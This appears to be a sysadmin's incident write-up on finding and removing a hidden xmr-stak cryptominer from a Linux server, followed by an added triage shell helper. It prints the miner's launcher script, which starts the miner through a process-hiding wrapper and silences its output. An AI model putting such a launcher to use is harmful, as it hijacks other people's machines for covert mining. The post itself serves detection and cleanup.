Logging into the server from a client was extremely sluggish, so I checked resource usage on the server.
One process was consuming a very large share of the CPU.
Check the process's working directory:
[root@176-18-0-10 ~]# pwdx 1268
1268: /usr/local/games/.cache
Inspect the malware directory and the contents of its launcher script:
[root@176-10-0-10 ~]# ls /usr/local/games/.cache
a h32 h64 run s s32 stak3 stakcentosold stakubuntunew upd x
[root@176-10-0-10 ~]# cat /usr/local/games/.cache/run
#!/bin/bash
#ps aux | grep -vw xmr-stak | awk '{if($3>40.0) print $2}' | while read procid
#do
#kill -9 $procid
#done
proc=`nproc`
ARCH=`uname -m`
HIDE="s"
OS="ubuntunew"
if [ "$ARCH" == "i686" ]; then
./h32 -s $HIDE ./stak3/ld-linux.so.2 --library-path stak3 ./s32 >>/dev/null &
elif [ "$OS" == "universal" ]; then
./h64 -s $HIDE ./stakubuntunew/system --library-path stakubuntunew ./s >>/dev/null &
elif [ "$OS" == "centosold" ]; then
./h64 -s $HIDE ./stakcentosold/system --library-path stakcentosold ./s >>/dev/null &
elif [ "$OS" == "ubuntuold" ]; then
./h64 -s $HIDE ./stakubuntunew/system --library-path stakubuntunew ./s >>/dev/null &
elif [ "$OS" == "ubuntunew" ]; then
./h64 -s $HIDE ./stakubuntunew/system --library-path stakubuntunew ./s >>/dev/null &
elif [ "$ARCH" == "x86_64" ]; then
./h64 -s $HIDE ./stakubuntunew/system --library-path stakubuntunew ./s >>/dev/null &
fi
echo $! > /tmp/.bash.pid
Check whether any unknown hosts have connections to the server:
netstat -antp
Having confirmed it is malware, the next step is to remove it.
What to remove: the trojan's directory (/usr/local/games/.cache) and the trojan process (1268).
rm -fr /usr/local/games/.cache
kill -9 1268
Checking process usage again, everything is back to normal.
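To make the triage steps above repeatable on other hosts, here is an added shell helper; it is not part of the original post. It picks out high-CPU processes from ps output, resolves a process's working directory from /proc (the same information pwdx printed above), flags working directories that sit in a dot-directory such as /usr/local/games/.cache, and lists the ESTABLISHED peers that a PID owns in netstat -antp output. The sample ps and netstat lines, the function names, and the 203.0.113.7 pool address are all constructed for this example (203.0.113.7 is a documentation address, not an indicator from the infection).

```shell
#!/bin/sh
# Added triage helper (example code, not from the original post). Every
# function takes its input as an argument, so it runs offline on the
# constructed samples below; on a real host, feed it live ps/netstat output.

# Constructed sample of `ps -eo pid,pcpu,comm --no-headers`, modelled on the
# infection above: PID 1268 is the miner, the other two are normal daemons.
SAMPLE_PS='1268 398.0 s
812 0.3 sshd
901 1.2 bash'

# Constructed sample of `netstat -antp` data lines. 203.0.113.7 is a
# documentation address standing in for the mining pool, not a real IoC.
SAMPLE_NET='tcp 0 0 176.18.0.10:45210 203.0.113.7:3333 ESTABLISHED 1268/./s
tcp 0 0 0.0.0.0:22 0.0.0.0:* LISTEN 812/sshd'

# Print the PIDs in ps output whose %CPU exceeds a threshold (default 80).
high_cpu_pids() {
    printf '%s\n' "$1" | awk -v t="${2:-80}" '$2 + 0 > t + 0 { print $1 }'
}

# Working directory of a live process, the same information pwdx prints.
proc_cwd() {
    readlink "/proc/$1/cwd" 2>/dev/null
}

# Succeed (exit 0) when a path has a dot-directory component such as
# /usr/local/games/.cache; "." and ".." are ordinary and do not count.
is_hidden_dir() {
    old_ifs=$IFS; IFS=/; set -f
    for part in $1; do
        case "$part" in
            .|..|'') ;;
            .*) IFS=$old_ifs; set +f; return 0 ;;
        esac
    done
    IFS=$old_ifs; set +f
    return 1
}

# Remote endpoints of ESTABLISHED connections owned by a given PID.
remote_peers_for_pid() {
    printf '%s\n' "$2" | awk -v p="$1" '$6 == "ESTABLISHED" && $7 ~ ("^" p "/") { print $5 }'
}

# One report line per high-CPU process: "PID cwd HIDDEN|ok peer...".
# $3 names the function used to look up the cwd, so the report can be
# produced from live /proc data (proc_cwd) or from a canned lookup offline.
triage_report() {
    ps_out=$1; net_out=$2; cwd_fn=${3:-proc_cwd}
    for pid in $(high_cpu_pids "$ps_out"); do
        cwd=$("$cwd_fn" "$pid")
        if is_hidden_dir "$cwd"; then flag=HIDDEN; else flag=ok; fi
        peers=$(remote_peers_for_pid "$pid" "$net_out" | tr '\n' ' ')
        printf '%s %s %s %s\n' "$pid" "${cwd:-?}" "$flag" "${peers% }"
    done
}

# Canned cwd lookup for the sample data (stands in for /proc on a real host).
sample_cwd() {
    case "$1" in
        1268) echo /usr/local/games/.cache ;;
        *) echo /root ;;
    esac
}

# Stand-alone run on the constructed samples.
triage_report "$SAMPLE_PS" "$SAMPLE_NET" sample_cwd
```

On a live host the same report comes from `triage_report "$(ps -eo pid,pcpu,comm --no-headers)" "$(netstat -antp 2>/dev/null)"`, which uses proc_cwd by default. Each function takes its data as an argument rather than calling ps or netstat itself, so the logic can be checked against saved output from an incident without touching the affected machine again.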